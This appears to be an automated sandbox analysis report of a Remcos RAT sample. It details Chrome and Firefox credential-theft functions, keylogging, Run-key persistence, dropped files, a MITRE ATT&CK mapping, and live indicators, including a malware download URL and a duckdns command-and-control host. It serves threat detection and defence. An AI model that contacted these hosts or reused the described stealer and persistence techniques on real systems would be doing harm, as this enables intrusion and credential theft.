Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		9_2_0040A953
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		13_2_0040A953

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	9_2_0040AA71
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \key3.db	9_2_0040AA71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	13_2_0040AA71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	13_2_0040AA71

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: cmd.exe		9_2_0040567A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe		13_2_0040567A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	11 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Timestomp	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	422 Process Injection	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	211 Masquerading	Cached Domain Credentials	45 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	241 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	2 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1m181Ru74o.exe	66%	ReversingLabs	Win32.Backdoor.Remcos
1m181Ru74o.exe	83%	Virustotal		Browse
1m181Ru74o.exe	100%	Avira	TR/AD.Nekark.ykcgg
1m181Ru74o.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\Ntmftfld.PIF	100%	Avira	TR/AD.Nekark.ykcgg
C:\Users\Public\Libraries\Ntmftfld.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Ntmftfld.PIF	66%	ReversingLabs	Win32.Backdoor.Remcos
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.mJ	0%	Avira URL Cloud	safe
https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc	100%	Avira URL Cloud	malware
craekuro.duckdns.org	0%	Avira URL Cloud	safe
https://aarzoomarine.com/owa	100%	Avira URL Cloud	phishing
https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
aarzoomarine.com	103.101.59.23	true	true		unknown
craekuro.duckdns.org	172.111.212.138	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc	true	Avira URL Cloud: malware	unknown
craekuro.duckdns.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp	SndVol.exe, colorcpl.exe	false		high
http://crl.mJ	1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	SndVol.exe, 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.microsoft.co	1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc	1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000684000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.pmail.com	1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000B.00000002.1550969058.0000000002FB2000.00000004.00001000.00020000.00000000.sdmp	false		high
https://aarzoomarine.com/owa	1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ocsp.sectigo.com0C	1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.111.212.138	craekuro.duckdns.org	United States		20860	IOMART-ASGB	true
103.101.59.23	aarzoomarine.com	India		45117	INPL-IN-APIshansNetworkIN	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562867
Start date and time:	2024-11-26 08:12:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1m181Ru74o.exe renamed because original name is a hash value
Original Sample Name:	050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@20/11@5/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 74 Number of non-executed functions: 234
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:13:07	API Interceptor	2x Sleep call for process: 1m181Ru74o.exe modified
02:13:29	API Interceptor	2x Sleep call for process: Ntmftfld.PIF modified
02:13:51	API Interceptor	5898237x Sleep call for process: SndVol.exe modified
08:13:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ntmftfld C:\Users\Public\Ntmftfld.url
08:13:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ntmftfld C:\Users\Public\Ntmftfld.url

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
aarzoomarine.com	LisectAVT_2403002A_420.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.13.115.251
	Kqxdlqyd.PIF.exe	Get hash	malicious	DBatLoader	Browse	103.13.115.251
	Kqxdlqyd.PIF.exe	Get hash	malicious	DBatLoader	Browse	103.13.115.251
	HyMryFI2eP.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.13.115.251
	rRFQ096784.bat	Get hash	malicious	Remcos, DBatLoader	Browse	103.13.115.251

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INPL-IN-APIshansNetworkIN	sora.arm.elf	Get hash	malicious	Unknown	Browse	111.125.250.236
	AMP4qOxnnc.elf	Get hash	malicious	Mirai	Browse	103.90.98.39
	huhu.arm-20240212-0910.elf	Get hash	malicious	Mirai, Okiru	Browse	103.90.98.25
	GHrwbsrdR8.elf	Get hash	malicious	Mirai	Browse	111.125.250.233
	skyljne.x86_64-20240109-1651.elf	Get hash	malicious	Mirai	Browse	103.90.98.50
	t6fSbo83L8.elf	Get hash	malicious	Mirai	Browse	103.90.97.220
	BWJ3Dpilxzevuv4T.dll	Get hash	malicious	Emotet	Browse	103.132.242.26
	BWJ3Dpilxzevuv4T.dll	Get hash	malicious	Emotet	Browse	103.132.242.26
	mirai.x86.elf	Get hash	malicious	Mirai	Browse	43.228.103.234
	VZlfpX97Uk.elf	Get hash	malicious	Mirai	Browse	103.90.98.34
IOMART-ASGB	fbot.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	188.227.187.51
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	176.56.207.19
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	85.232.55.0
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	84.22.176.77
	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse	217.194.217.164
	x86.elf	Get hash	malicious	Mirai	Browse	193.37.77.239
	mNtu4X8ZyE.exe	Get hash	malicious	Emotet	Browse	178.250.54.208
	75A0VTo3z9.exe	Get hash	malicious	Emotet	Browse	178.250.54.208
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	37.220.28.60
	nklarm7.elf	Get hash	malicious	Unknown	Browse	37.220.16.83

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	nft438A5fN.exe	Get hash	malicious	DBatLoader, Remcos	Browse	103.101.59.23
	6BE4RDldhw.exe	Get hash	malicious	DBatLoader	Browse	103.101.59.23
	AnyDesk.exe	Get hash	malicious	DBatLoader	Browse	103.101.59.23
	file.exe	Get hash	malicious	Unknown	Browse	103.101.59.23
	file.exe	Get hash	malicious	Unknown	Browse	103.101.59.23
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	103.101.59.23
	file.exe	Get hash	malicious	LummaC Stealer	Browse	103.101.59.23
	file.exe	Get hash	malicious	LummaC Stealer	Browse	103.101.59.23
	file.exe	Get hash	malicious	Unknown	Browse	103.101.59.23
	file.exe	Get hash	malicious	Unknown	Browse	103.101.59.23

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\alpha.pif	nft438A5fN.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	USD470900_COPY_800BLHSBC882001.PDF.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Windows\SysWOW64\SndVol.exe
File Type:	data
Category:	dropped
Size (bytes):	392
Entropy (8bit):	3.309731221673357
Encrypted:	false
SSDEEP:	6:6lfXls5YcIeeDAl2i631gWA41GfE/OS/1gWAGfE/OSFWAv:6lt8ec8/3SWt/OSqWa/OSFW+
MD5:	87AC6E8061FFF1C052E0E2FFE768813E
SHA1:	94914C44970A48FFA9CE78AD23D56752CAE7D7AC
SHA-256:	F1D964FFE3155DC3902E16CC91BCCACC3B24BE3D33F9CDB3DBB19D862FF8CE7E
SHA-512:	B7F90ADABD4D8B532438692B02023B63FFD1E70B5E8A26ACE158D064FAE9A429469AA1D2157C141D20160862FA56920889E569D535F7BA88A74D3A1AACBB3012
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.1.1./.2.6. .0.2.:.1.3.:.1.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.V.o.l.u.m.e. .M.i.x.e.r.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\Public\Libraries\Ntmftfld

Download File

Process:	C:\Users\user\Desktop\1m181Ru74o.exe
File Type:	data
Category:	dropped
Size (bytes):	790361
Entropy (8bit):	7.385347980727179
Encrypted:	false
SSDEEP:	12288:wzsjIoL0tsnYkGOoyz+vzM2wUwWCWEKxYjVc81H7cNyXwwAZ6mzwhw5zT1g41Kly:Us13YVOoyzigGJxYe8lgNyz0d
MD5:	53838C594C592447AEC53DF24B3F791E
SHA1:	835FDACF7E25A50FA8D50A4A7EEADD7636AF9441
